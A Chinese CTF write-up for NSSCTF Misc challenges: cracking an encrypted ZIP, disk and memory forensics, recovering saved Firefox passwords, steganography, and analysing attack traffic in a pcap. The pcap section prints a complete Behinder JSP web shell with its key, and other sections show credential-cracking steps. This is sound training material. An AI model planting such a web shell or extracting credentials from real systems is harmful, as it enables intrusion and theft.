Misc
mybrave
包含PNG图片的加密ZIP,未发现密码提示,尝试PNG头明文攻击
制作PNG头文件
echo 89504E470D0A1A0A0000000D49484452 | xxd -r -ps > png_header进行明文攻击,得到key
./bkcrack.exe -C mybrave.zip -c mybrave.png -p png_header -o 0
bkcrack 1.7.1 - 2024-12-21
[16:16:21] Z reduction using 9 bytes of known plaintext
100.0 % (9 / 9)
[16:16:21] Attack on 704864 Z values at index 6
Keys: 97d30dcc 173b15a8 6e0e7455
34.5 % (243021 / 704864)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 243021
[16:17:05] Keys
97d30dcc 173b15a8 6e0e7455通过key更改压缩包密码(也可以爆破密码,但是不推荐)
./bkcrack.exe -C mybrave.zip -k 97d30dcc 173b15a8 6e0e7455 -U mybrave_solved.zip 666
bkcrack 1.7.1 - 2024-12-21
[16:19:17] Writing unlocked archive mybrave_solved.zip with password "666"
100.0 % (1 / 1)
Wrote unlocked archive.
发现PNG尾部有可以数据,提取后Base64解码,得到Flag
NSSCTF{I'm_Wh1sp3riNg_OuR_Lu11abY_f0r_Y0u_to_CoMe_B4ck_Home}mydisk-1
问题1:mrl64的登录密码是什么?在home\l0v3miku\Desktop路径下发现remember.txt
MON: w3t4fw3t
TUES: FW4AE32ed
WED: d2D562Wd2
THUR: JHUIY84d9
FRI: ni289UJ8O
SAT: nmi3SDQ2
SUN: 3jn723JK在etc\shadow 获取到密码的hash
l0v3miku:$y$j9T$Me1sc6HllhxzlxG2YpNXi0$8oums.4ZpbnCsK0a.lmkodOFeCtpC2daRGLz.jAoKI0:20113:0:99999:7:::用john进行爆破,跑rockyou.txt得到密码
学习到其他师傅的一种做法是直接用rockyou.txt进行AES的解密
import hashlib
from Crypto.Cipher import AES
dic_path = 'D:/Dic/rockyou.txt'
with open(dic_path, 'r', encoding='latin-1') as file:
for line in file:
PASSWORD = line.strip()
ANSWER = "120_http://192.168.252.1:8000"
FLAG = "th3_TExt_n0w_YOU_kn0w!"
HASH = hashlib.blake2b()
HASH.update(PASSWORD.encode() + ANSWER.encode() + FLAG.encode())
D = HASH.digest()
KEY = D[0:16]
IV = D[16:32]
cipher = AES.new(KEY, AES.MODE_GCM, IV)
C_ = bytes.fromhex("0565bd65d5920de6ed335761b245a938f6b4d6a3a70b2e0d79991673d8bf6230a79241d397003fcb6f8afcc5")
H = bytes.fromhex("8ed6e078f14d16e52da4e3bbe88e325d")
try:
FLAG = cipher.decrypt_and_verify(C_, H)
print(f'Password is {PASSWORD}')
print(FLAG.decode())
break
except :
continue能够更快的获得密码
Password is theo0114@
NSSCTF{88f96978-ec64-4255-8df7-43e5ec9c9b6e}问题2: mrl64设置了一个定时任务,他每多少秒向什么地址发送一个请求?查看Cron计划,定位到可疑的定时任务,可以得到时间间隔为120s
确定a.py的路径
usr\local\share\xml\entities\a.py查看a.py,得到地址
import requests
def fetch_content(url):
try:
response = requests.get(url)
response.raise_for_status() # Raise an error for HTTP codes 4xx/5xx
print(response.text)
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
url = "http://192.168.252.1:8000"
fetch_content(url)答案为
120_http://192.168.252.1:8000问题3:有人发送了一封邮件给mrl64,你能获取到邮件中的flag吗?大致查看可以确定邮件使用的是Foxmail,在 \home\l0v3miku.wine\drive_c\Foxmail 7.2\Storage 路径下提取出用户文件
本地安装Foxmail,登陆自己的账号后将提取出的用户文件拖入 Storage ,更改 Foxmail 7.2 下的 FMStorage.list,加上
Storage\632290674@qq.com\重新启动,打开后发现邮件
掩码爆破
w3t4fw3t????
FW4AE32ed????
d2D562Wd2????
JHUIY84d9????
ni289UJ8O????
nmi3SDQ2????
3jn723JK????得到压缩包密码
nmi3SDQ22580解压得到Flag
th3_TExt_n0w_YOU_kn0w!完整答案如下
# 问题1:mrl64的登录密码是什么?
PASSWORD = "theo0114@" # string of login password
# 问题2: mrl64设置了一个定时任务,他每多少秒向什么地址发送一个请求?
ANSWER = "120_http://192.168.252.1:8000" # string of answer, like "90_http://127.0.0.1:6666"
# 问题3:有人发送了一封邮件给mrl64,你能获取到邮件中的flag吗?
FLAG = "th3_TExt_n0w_YOU_kn0w!" # string of flag运行得到Flag
NSSCTF{88f96978-ec64-4255-8df7-43e5ec9c9b6e}mydisk-2
问题1:mrl64的这台电脑的系统名是什么?查看 etc/issue 文件
Linux Mint 22.1 Xia \n \l得到系统名
Linux Mint 22.1 Xia问题2: 你知道mrl64的ctfshsow的账号密码吗?在 \home\l0v3miku.mozilla\firefox 路径下,先将Firefox的配置文件导出
获得记录文件 logins.json(或signons.sqlite)和密钥文件 key4.db(或key3.db),保存在Firepwd.py文件夹下,执行命令
python3 firepwd.py logins.json得到解密信息
globalSalt: b'1b0194b7b99b5db3b74c30913de216b5a77ba379'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'094c7be8c7764131d450807e2e090a6cbc576b5943473d34b104e37dc689f8ef'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'f9bb21d1042ebdfd5490ccb282a1'
}
}
}
OCTETSTRING b'fecc109cd50fbfc78cf6fce1f9b7482b'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'94d83e7f733c471e25ef6640ef6b2c1605ed884bd899c9a6e6d1eec89cf3bf72'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'1df636fd6010eeb3a512967cf24a'
}
}
}
OCTETSTRING b'd1b88e03b9449ded2abce109153302cc2aafa26f2602f40794888df006b1dc6d'
}
clearText b'193b9752fb5275868fd0ef9e75ef79f4fb73f80d374346380808080808080808'
decrypting login/password pairs
https://ctf.show:b'l0v3Miku',b'mrl64_love_miku'得到账号密码
l0v3Miku/mrl64_love_miku问题3:mrl64的电脑上有一个docker容器,其环境里存储了一个重要信息,你知道是什么吗?在 \var\lib\docker\containers 路径下找到dockers的存储容器信息文件 config.v2.json
{
"StreamConfig": {
},
"State": {
"Running": false,
"Paused": false,
"Restarting": false,
"OOMKilled": false,
"RemovalInProgress": false,
"Dead": false,
"Pid": 0,
"ExitCode": 137,
"Error": "",
"StartedAt": "2025-01-25T15:27:49.649779636Z",
"FinishedAt": "2025-01-25T15:28:32.175453109Z",
"Health": null
},
"ID": "b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af",
"Created": "2025-01-25T15:27:49.488917182Z",
"Managed": false,
"Path": "/bin/bash",
"Args": [
"/docker-entrypoint.sh"
],
"Config": {
"Hostname": "b166c738b107",
"Domainname": "",
"User": "",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"ExposedPorts": {
"9999/tcp": {
}
},
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"LANG=C.UTF-8",
"GPG_KEY=7169605F62C751356D054A26A821E680E5FA6305",
"PYTHON_VERSION=3.12.8",
"PYTHON_SHA256=c909157bb25ec114e5869124cc2a9c4a4d4c1e957ca4ff553f1edc692101154e",
"IMPORTANT_INFO=Y0U_FouNd_mE!"
],
"Cmd": null,
"Image": "edd5aa8131c3",
"Volumes": null,
"WorkingDir": "",
"Entrypoint": [
"/bin/bash",
"/docker-entrypoint.sh"
],
"OnBuild": null,
"Labels": {
"auther_template": "CTF-Archives"
}
},
"Image": "sha256:edd5aa8131c38faba4b89399cdffcf8b53e559ec915580eb35ca21671c708023",
"ImageManifest": null,
"NetworkSettings": {
"Bridge": "",
"SandboxID": "",
"SandboxKey": "",
"HairpinMode": false,
"LinkLocalIPv6Address": "",
"LinkLocalIPv6PrefixLen": 0,
"Networks": {
"bridge": {
"IPAMConfig": null,
"Links": null,
"Aliases": null,
"MacAddress": "",
"DriverOpts": null,
"NetworkID": "eb19cb0a860bbd1a360488fcc038278480c36b7b217542ddc91c79e4237d02e9",
"EndpointID": "",
"Gateway": "",
"IPAddress": "",
"IPPrefixLen": 0,
"IPv6Gateway": "",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"DNSNames": null,
"IPAMOperational": false,
"DesiredMacAddress": ""
}
},
"Service": null,
"Ports": null,
"SecondaryIPAddresses": null,
"SecondaryIPv6Addresses": null,
"HasSwarmEndpoint": false
},
"LogPath": "/var/lib/docker/containers/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af-json.log",
"Name": "/wow",
"Driver": "overlay2",
"OS": "linux",
"RestartCount": 0,
"HasBeenStartedBefore": true,
"HasBeenManuallyStopped": true,
"MountPoints": {
},
"SecretReferences": null,
"ConfigReferences": null,
"MountLabel": "",
"ProcessLabel": "",
"AppArmorProfile": "docker-default",
"SeccompProfile": "",
"NoNewPrivileges": false,
"HostnamePath": "/var/lib/docker/containers/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af/hostname",
"HostsPath": "/var/lib/docker/containers/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af/hosts",
"ShmPath": "",
"ResolvConfPath": "/var/lib/docker/containers/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af/resolv.conf",
"LocalLogCacheMeta": {
"HaveNotifyEnabled": false
}
}在 ENV 中的 "IMPORTANT_INFO“ 处找到答案
Y0U_FouNd_mE!完整答案如下
# 问题1:mrl64的这台电脑的系统名是什么?
NAME = "Linux Mint 22.1 Xia" # name of OS, like "Ubuntu 18.04.5 LTS"
# 问题2: 你知道mrl64的ctfshow的账号密码吗?
ANSWER = "l0v3Miku/mrl64_love_miku" # string of answer, like "mrl64/123456"
# 问题3:mrl64的电脑上有一个docker容器,其环境里存储了一个重要信息,你知道是什么吗?
INFO = "Y0U_FouNd_mE!" # string of important info运行得到Flag
NSSCTF{085edba8-dd9d-4758-a90c-14c6816b5077}mycode
找GPT要一个算法,写一个交互
from pwn import *
import sys
from functools import cmp_to_key
def compare(a, b):
return -1 if a + b < b + a else 1
def min_concat_number(nums):
nums = list(map(str, nums))
nums.sort(key=cmp_to_key(compare))
result = ''.join(nums)
return result.lstrip('0') or '0'
io = remote("node2.anna.nssctf.cn",28255)
for i in range(100):
io.recvuntil(b'Numbers: ')
data = io.recvline().strip().decode()
min_number = min_concat_number(data.split())
io.sendlineafter(b'Smallest:', min_number.encode())
io.interactive()mymem-1
问题1:mrl64发现有人在他的电脑上偷偷下载了些什么,你能拿到其中的pass1吗?查看浏览器历史记录,找到下载文件名称
file:///C:/Users/l0v3Miku/Downloads/DgP1YTr/rWFA8Xcd.pydump文件进行查看
import os
from zTuS2beK import *
from Crypto.Util.number import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
m = bytes_to_long(hint)
p = getPrime(1024)
q = getPrime(1024)
n = p * q
gift = p + q
e = 0x10001
c = pow(m, e, n)
print(c)
print(n)
print(gift)
key = bytes(os.environ.get('key1'),'utf-8')
iv = key2
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(pass1, AES.block_size))
print(ciphertext.hex())key1需要从环境变量读出
thisiskey1_12345key2猜测需要从进程中读取
strings pid.1228.dmp > notepad.txt得到以下信息
OK_p4ss1_y0u_G3T_1t_n0ws.
hint{key2_is_my_login_password_repeated_twice}s
P@ssW0RdP@ssW0RdN)
pass1
hint
key2得到pass1
OK_p4ss1_y0u_G3T_1t_n0w问题2: mrl64很喜欢用Windows自带的画图软件画画,这次他情不自禁地把pass2也给画上去了,但是他还没关掉画图软件就去吃饭了。那么你看到pass2了吗?利用pslist插件查看内存中的系统进程,寻找mspaint.exe的进程号
利用GIMP对进程画面进行复原
调整图片后得到pass2
OHHHH_y0u_c4n_s3e_MY_P@ss2问题3:你知道mrl64电脑的产品ID是什么吗?在注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion 位置找到ProductId,得到答案
00371-220-0367543-86165完整答案如下
# 问题1:mrl64发现有人在他的电脑上偷偷下载了些什么,你能拿到其中的pass1吗?
PASS1 = "OK_p4ss1_y0u_G3T_1t_n0w" # string of pass1
# 问题2: mrl64很喜欢用Windows自带的画图软件画画,这次他情不自禁地把pass2也给画上去了,但是他还没关掉画图软件就去吃饭了。那么你看到pass2了吗?
PASS2 = "OHHHH_y0u_c4n_s3e_MY_P@ss2" # string of pass2
# 问题3:你知道mrl64电脑的产品ID是什么吗?
PRODUCT_ID = "00371-220-0367543-86165" # string of product_id,like xxxxx-xxx-xxxxxxx-xxxxx运行得到Flag
NSSCTF{101e5799-55e8-42c9-b58a-5f1d30039126}mymem-2
问题1:mrl64的电脑里似乎有一个奇怪的进程正在运行,这个进程的物理偏移值是多少?查看进程,发现 DumpIt.exe
得到偏移
0xfa800423a9b0问题2: 这个奇怪的进程总共运行了多少次?其窗口被作为焦点总共多长时间?在userassist中进行查看
得到答案
2_0:00:07.879000问题3:这个奇怪的进程的PoolTag是什么?mypixel
通过zsteg查看通道,发现 ZIP 数据
zsteg -a attachment.png
提取到 1.zip
zsteg -E "b8,rgb,lsb,xy" attachment.png > 1.zip解压得到 out.png,发现只有黑白像素,写一个脚本进行提取
from PIL import Image
def read_image_pixels(image_path):
image = Image.open(image_path).convert('L')
width, height = image.size
pixel_str = ""
for y in range(height):
for x in range(width):
pixel = image.getpixel((x, y))
pixel_str += "0" if pixel > 127 else "1" # 用 0 表示白色,1 表示黑色
return pixel_str
image_path = "output.png"
pixels = read_image_pixels(image_path)
print(pixels)将得到的二进制转化成png,得到汉信码
扫码得到Flag
NSSCTF{f92a7a2e-9606-4319-9d97-942de4f0315a}mywav
根据提示可以知道和Hz有关,并且只有两种,可以想到二进制或者摩斯密码之类的
首先写一个wav解析代码查看波形,可以看到波形确实是有疏密,也就是频率的改变。但是我们并不知道按多少点周期对频率高低进行划分。这里直接在查看波形代码的基础上加入检测变化点周期的功能
import wave
import numpy as np
import matplotlib.pyplot as plt
# 打开WAV文件
file_path = 'attachment.wav' # 这里替换为你的WAV文件路径
with wave.open(file_path, 'rb') as wav_file:
# 获取WAV文件参数
sample_rate = wav_file.getframerate()
num_frames = wav_file.getnframes()
# 读取波形数据
wave_data = np.frombuffer(wav_file.readframes(num_frames), dtype=np.int16)
# 只绘制前1000个点
plot_data_points = 1000
plt.plot(wave_data[:plot_data_points])
# 计算波形数据的差分
diff_data = np.diff(wave_data[:plot_data_points])
# 检测频率变化的位置
threshold = 500 # 根据实际情况调整
change_points = np.where(np.abs(diff_data) > threshold)[0]
# 获取第一次变化的位置并标记
if change_points.size > 0:
first_change_point = change_points[0]
plt.axvline(x=first_change_point, color='red', linestyle='--', label=f"{first_change_point}")
print(f"第一次频率变化的位置:{first_change_point} 点")
else:
print("没有检测到明显的频率变化。")
# 显示图像
plt.xlabel('Sample')
plt.ylabel('Amplitude')
plt.legend()
plt.show()可以得到变化周期为441
得到周期后,我们按照这个周期对波形进行一个划分
import wave
import numpy as np
import matplotlib.pyplot as plt
# 打开WAV文件
file_path = 'attachment.wav' # 这里替换为你的WAV文件路径
with wave.open(file_path, 'rb') as wav_file:
# 获取WAV文件参数
sample_rate = wav_file.getframerate()
num_frames = wav_file.getnframes()
# 读取波形数据
wave_data = np.frombuffer(wav_file.readframes(num_frames), dtype=np.int16)
# 只绘制前1000个点
plot_data_points = 5000
plt.plot(wave_data[:plot_data_points])
# 每隔441个点绘制一条红线
interval = 441
for i in range(0, plot_data_points, interval):
plt.axvline(x=i, color='red', linestyle='--')
# 显示图像
plt.xlabel('Sample')
plt.ylabel('Amplitude')
plt.show()得到以下图像,这样就可以较为直观准确的看出区别了
继续写一个脚本通过对区间内的频率进行一个01的转化,得到二进制字符串
import wave
import numpy as np
# 打开WAV文件
file_path = 'attachment.wav' # 这里替换为你的WAV文件路径
with wave.open(file_path, 'rb') as wav_file:
# 获取WAV文件参数
sample_rate = wav_file.getframerate()
num_frames = wav_file.getnframes()
# 读取波形数据
wave_data = np.frombuffer(wav_file.readframes(num_frames), dtype=np.int16)
# 每隔441个点划分区间
interval = 441
plot_data_points = len(wave_data)
# 假设的频率阈值
freq_a = 300 # 频率 A(代表 0)
freq_b = 700 # 频率 B(代表 1)
# 傅里叶变换并计算频率
binary_frequencies = []
for i in range(0, plot_data_points, interval):
# 获取当前区间的信号数据
segment = wave_data[i:i+interval]
# 对信号数据做快速傅里叶变换(FFT)
fft_result = np.fft.fft(segment)
# 计算对应的频率
freqs = np.fft.fftfreq(len(segment), d=1/sample_rate)
# 获取幅度谱(只取正频率部分)
fft_magnitude = np.abs(fft_result)
positive_freqs = freqs[:len(freqs)//2]
positive_magnitude = fft_magnitude[:len(fft_magnitude)//2]
# 找到幅度最大的频率
peak_freq = positive_freqs[np.argmax(positive_magnitude)]
# 根据频率判断是频率 A 还是频率 B
if np.abs(peak_freq - freq_a) < np.abs(peak_freq - freq_b):
binary_frequencies.append('0') # 代表 频率 A
else:
binary_frequencies.append('1') # 代表 频率 B
# 将所有二进制数字拼接为一个长字符串
binary_string = ''.join(binary_frequencies)
# 输出最终的二进制字符串
print("Final Binary String:")
print(binary_string)二进制解码后得到
YbAgLvWkQbFp qk k 2021 Gfgbyue gxriobzqgx hpyau utnkxmgz Jpwx Dfcmocn ngj Bn Flvytmc. Gh cu bnlkh hg apw Mlglsmg nbokp Lxjzwdw gl hbg Lnmzmvx. Apw cipgsm ciexj sg Fhvyy XT dfio Ahzawm 10 nubav Eseimv 26, 2021.
Tux yikbla zkw qsfjcsfxj e vntcdkxgts pkejxxwabw wx 1.3 lmjjwip apkuwl ohzayyq nzuvfbksw, bgjtmnmle Aupgb MB'w whtmkdma ydjniptzmhg, FwmDyzc, ohf Tutoptgk BjeiGB.
Gspoclow
Mal awbmcq hynlf mni lmvzq yj y qijgrvhx egw bvjepw aogruf fgpx zvl Rrss Qwswe (Pakr Salgmkr) ylr u jenwyxkhuo, kdyzzclp, aaw rsoxsg Usrbcfynln zove, Wpvy Hmyl (Lo Oeazpmx). Yywe liglu gwthtrpr xekdewgts ncbyxsemxz il cgfmcf vo oxisfbuo wkgf mhbgr'f eojxevvy msknohkoal or malqj tsspbya tukuyza fwmdl. Yjhbquta zlxr jwmvhl'r gncnq xgga hapwb er dwlut, gakc vhtm ly ennfyeinmk itvo wlrip'q gnteazzll bu bzomp bos-vo-qte mgmlzsmxgmbm.
Oavg
Ilxg Gpwiyyl om Bhbn Ymrnl
I qyyle, vupdfhsi lvowdkv ufc yzuqxy eg tpz gp ejmczpefl grw bubwvpgeshee. Qxytbml pac gmjr upd qbyxtga mpdipgcl, je chywxlzmk k kclhfg aaw jimxyuaxib lonwrr mnem wyqnow fga nq phkyyx apa axrcpaiut qxymkxz. Qf dlc dowg os ygqbef kzkpjcbags, ux xiftpvk biqmzove vg nml ibzkemr mt bks qkkefl.
Ec Eorehwy cs Qbtk Qbhv
Sx yluopgrvgm egw kmlovkgbyf ybntk phtif glm lspgr gnxrl tdiq pvmk qbclyxtkxl bvlsp qfs zccrl gr bgzcjwsslhudlr hhwmtjtw. Rip jwzg uawkvpxub s nvykonkc gkgrlyvzekxgmb qjea lni kxswukxcb tlqm n lseee awox xm Qvyphnb Immr. Pvxvyclqyf bl akv rhbbzpyj gajwlfbbigxza kri qfcqeafx nik ypmjmi bchytmvggxbhu ifn yluopgrvgm tnkzcad sd fsl ioney.
Whflbzsre Nomuwbkj
WhecmA7DsE3rTf4i可以看到这80%应该是维吉尼亚,通过在线网站进行爆破,得到密钥
AnGeLiDeMiMi is a 2021 Chinese television drama starring Chen Zheyuan and Xu Mengjie. It is based on the Chinese novel Secrets in the Lattice. The series aired on Mango TV from August 10 until August 26, 2021.
The series has surpassed a cumulative viewership of 1.3 billion across various platforms, including Mango TV's domestic application, YouTube, and Thailand TrueID.
Synopsis
The series tells the story of a superior and unruly campus male god Zhou Siyue (Chen Zheyuan) and a headstrong, stubborn, and lovely Cinderella girl, Ding Xian (Xu Mengjie). From being mutually exclusive tablemates at school to becoming each other's lifelong companions in their journey through youth. Although they couldn't stand each other at first, they come to appreciate each other's strengths in their day-to-day interactions.
Main
Chen Zheyuan as Zhou Siyue
A young, handsome scholar who exudes an air of aloofness and intelligence. Despite his cold and distant exterior, he possesses a gentle and determined nature that drives him to pursue his innermost desires. In the face of family challenges, he remains resolute in his pursuit of his dreams.
Xu Mengjie as Ding Xian
An unwavering and determined young woman who never turns away from challenges until she faces an insurmountable obstacle. Her life underwent a dramatic transformation when she relocated from a small town to Shenhai City. Influenced by her youthful impulsiveness she showcase her fierce determination and unwavering pursuit of her goals.
Something Password
SolveI7ToG3tFl4g在最开始分析wav可以发现末尾存在一个以ž—º*开头的未知数据,老油条应该知道这是Oursecret的加密特征
通过密钥进行解密,得到Flag
NSSCTF{9c99897d-5ea3-481c-b0a5-029fec9eaf42}mypcap
问题1:请问被害者主机开放了哪些端口?提交的答案从小到大排序并用逗号隔开查看此类带有返回相应的
过滤器设置
ip.src == 192.168.252.136
发现三个端口开放,得到答案
22,3306,8080问题2:mrl64喜欢把数据库密码放到桌面上,这下被攻击者发现了,数据库的密码是什么呢?一把梭得到密码
也可以到流量包中找到登陆的流量
9c2a09cdfcbd7da7d306ffbf77dad8608ee92bea但是不幸的是root的并不是需要的,我们继续看可以看到攻击流量
<%@page import="java.util.*, javax.crypto.*, javax.crypto.spec.*"%>
<%!
// 自定义类加载器
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
// 定义类的方法
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
%>
<%
// 检查请求方法是否为POST
if (request.getMethod().equals("POST")) {
// 密钥为连接密码32位md5值的前16位
String k = "8a1e94c07e3fb7d5";
// 将密钥存入session
session.putValue("u", k);
// 获取AES加密实例
Cipher c = Cipher.getInstance("AES");
// 初始化Cipher为解密模式
c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(k.getBytes(), "AES"));
// 读取请求体中的Base64编码数据并解码
byte[] encryptedData = new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine());
// 解密数据
byte[] decryptedData = c.doFinal(encryptedData);
// 使用自定义类加载器加载解密后的类并实例化
Class<?> clazz = new U(this.getClass().getClassLoader()).g(decryptedData);
Object instance = clazz.newInstance();
// 调用实例的equals方法
instance.equals(pageContext);
}
%>得到冰蝎流量的密码
8a1e94c07e3fb7d5但是一把梭里面的不太准确
这里到原流量包中提取手动解密
sWZAhWwEZKAKCM5D0o0FfJ/pBmauGQWuRQhpdPtUopgKvh//Wwi4JQNwF9t80IuICWUZB54wVsLuLMzv74vRYmIXZ5jn1/pbg+UEPryUCtc=解密后得到返回
{"msg":"bXlzcWwgcGFzc3dvcmQgaXMgbjFjZXA0U3MK","status":"c3VjY2Vzcw=="}base64解密得到密码
mysql password is n1cep4Ss问题3:攻击者在数据库中找到了一个重要的数据,这个重要数据是什么?对应查找mysql流量
在其中一行找到重要信息
Th1s_1s_Imp0Rt4Nt_D4Ta完整答案如下
# 问题1:请问被害者主机开放了哪些端口?提交的答案从小到大排序并用逗号隔开
PORT = "22,3306,8080" # string of open port, like "8000,8888,9999,10000"
# 问题2:mrl64喜欢把数据库密码放到桌面上,这下被攻击者发现了,数据库的密码是什么呢?
PASSWORD = "n1cep4Ss" # string of password
# 问题3:攻击者在数据库中找到了一个重要的数据,这个重要数据是什么?
DATA = "Th1s_1s_Imp0Rt4Nt_D4Ta" # string of important data运行得到Flag
NSSCTF{703663c4-1ff1-4c51-83b8-0f4303e82659}